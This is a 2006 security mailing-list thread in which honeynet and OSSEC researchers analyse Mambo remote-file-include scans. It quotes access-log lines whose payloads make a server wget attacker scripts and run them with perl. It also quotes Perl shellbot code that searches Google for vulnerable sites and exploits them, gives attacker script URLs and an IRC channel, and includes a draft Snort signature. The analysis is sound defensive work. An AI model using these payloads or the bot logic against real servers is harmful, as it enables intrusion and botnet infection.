I was looking at the scripts they try to download and it does not looks like a common perl bot (connecting to irc). It's also written in php and by a brazilian person (comments in portuguese) and with a terrible code :) I didn't have time to fully look at it, though.
These are the pages they access: http://usuarios.lycos.es/athos666/d25/ http://usuarios.lycos.es/athos666/d25/therules25.dat http://radius01.comete.ci/tool.gif I'm attaching them just in case they remove these pages (please be aware that they are scripts, not gifs :)). Thanks, -- Daniel B. Cid dcid @ ( at ) ossec.net --- Jamie Riden <[EMAIL PROTECTED]> escreveu: > Seems to have some kind of google search code for > the particular > vulnerability - haven't seen this before: > > if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M > sendraw($IRC_cur_socket, "PRIVMSG > $printl > :\002[GOOGLE]\002 Scanning for unpatched mambo for > ".$1." > seconds.");^M > srand;^M > my $itime = time;^M > my ($cur_time);^M > my ($exploited);^M > $boturl=$2;^M > $cur_time = time - $itime;$exploited = > 0;^M > while($1>$cur_time){^M > $cur_time = time - $itime;^M > @urls=fetch();^M > foreach $url (@urls) {^M > sendraw($IRC_cur_socket, > "PRIVMSG $printl > :\002[GOOGLE]\002 Trying to exploit ".$url);^M > $cur_time = time - $itime;^M > my $path = "";my $file = > "";($path, $file) = > $url =~ /^(.+)\/(.+)$/;^M > $url > =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M > $page = http_query($url);^M > $exploited = $exploited + > 1;^M > }^M > }^M > sendraw($IRC_cur_socket, "PRIVMSG > $printl > :\002[GOOGLE]\002 Exploited ".$exploited." boxes in > ".$1." > seconds.");^M > > This is a quick stab at a snort sig: > > alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 > (msg: "BLEEDING-EDGE > perlb0t Bot Reporting Scan/Exploit"; flow: > to_server,established; > content:"PRIVMSG|20|"; nocase; within: 80; tag: > session, 20, packets; > pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; > within:16; > pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i"; > classtype: trojan-activity; sid: xxxx; rev:1; ) > > but I'm sure this could be improved. > > cheers, > Jamie > > On 15/05/06, Jamie Riden <[EMAIL PROTECTED]> wrote: > > Looks like some sort of shellbot wanting to > connect to an IRC channel > > #abusers on abuser.hacked.in:8080. > > > > I've been seeing occaisonal probes for Mambo's > index.php on and off > > for a while now - the first part is similar to > > > http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf > but the > > payloads are slightly different, though it always > seems to end up with > > an IRC bot of some kind. > > > > I usually see them coupled with scans for > coppermine and other remote > > include issues, plus xmlrpc probes. > > > > I think you're seeing an attempt to exploit > issue#3 here - > > http://secunia.com/advisories/18935/ > > > > cheers, > > Jamie > > > > On 14/05/06, Daniel Cid <[EMAIL PROTECTED]> > wrote: > > > Since Thursday night I'm seeing a high volume of > scans > > > on different web servers for possibly the > following > > > vulns: > > > > > > http://secunia.com/advisories/14337/ > > > > http://www.osvdb.org/displayvuln.php?osvdb_id=10180 > > > > > > > > > However, they say the problem is on function.php > and > > > I'm seeing them on index.php. Can anyone confirm > that? > > > > > > Some log samples: > > > > > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] > "GET > > > > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? > > > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > > > > -- > > Jamie Riden / [EMAIL PROTECTED] / > [EMAIL PROTECTED] > > NZ Honeynet project - http://www.nz-honeynet.org/ > > > > > -- > Jamie Riden / [EMAIL PROTECTED] / > [EMAIL PROTECTED] > NZ Honeynet project - http://www.nz-honeynet.org/ > _______________________________________________________ Navegue com o Yahoo! Acesso Grátis, assista aos jogos do Brasil na Copa e ganhe prêmios de hora em hora! http://br.yahoo.com/artilheirodacopa/
therules25.dat
Description: 1269156576-therules25.dat
